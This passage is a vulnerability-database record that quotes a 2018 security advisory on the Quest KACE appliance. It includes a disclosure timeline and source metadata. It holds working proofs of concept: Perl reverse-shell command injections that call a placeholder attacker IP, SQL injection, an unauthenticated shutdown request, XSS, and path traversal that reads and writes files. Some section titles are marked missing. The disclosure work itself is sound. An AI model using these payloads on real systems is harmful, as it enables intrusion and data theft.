serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. 
The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 
20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *[section title missing in this copy]*\n\n[CVE-ID missing in this copy; the advisory\u0027s ordered class and CVE lists\npair the third issue with Deserialization of Untrusted Data (CWE-502) and\nCVE-2018-11135, i.e. a PHP object injection reachable by an authenticated user]\n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that require higher privileges, the application\nrelies on a message queue manager that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers: the\nlocalhost check trusts client-supplied headers rather than the TCP peer\naddress, so a remote client sending \u0027Host: localhost\u0027 and\n\u0027X-Forwarded-For: ::1\u0027 (as in the PoC below) passes it. 
\n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user (note that the CSRF_TOKEN part is sent empty,\nso the CSRF token does not appear to be enforced on this path either):\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *[section title and CVE-ID missing in this copy; per 7.1 this is the\nSQL injection in the \u0027orgid\u0027 parameter of\n\u0027/common/download_agent_installer.php\u0027, reachable unauthenticated]*\nIn particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *[section title and CVE-ID missing in this copy; the PoC below targets\nthe \u0027reportId\u0027 parameter of \u0027/common/run_report.php\u0027 with a session cookie,\ni.e. as an authenticated user]* In particular, an error based\ntype. 
\n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script (the request below still carries a session\ncookie, i.e. any authenticated user can do this). \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n[The URL below is the 7.9 XSS proof of concept repeated here by mistake;\nthe 7.10 proof of concept is the GET request that follows it.]\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, 
OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. 
Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 
\n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. 
\n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11135",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15641",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11135",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"id": "VAR-201805-0595",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
}
]
},
"last_update_date": "2023-12-18T12:01:57.760000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Quest KACE System Management Appliance PHP object injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137673"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=81231"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-1321",
"trust": 1.0
},
{
"problemtype": "CWE-94",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/915.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.403000",
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"date": "2022-12-02T19:13:11.127000",
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"date": "2022-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Code injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
],
"trust": 0.6
}
}
VAR-201805-0600
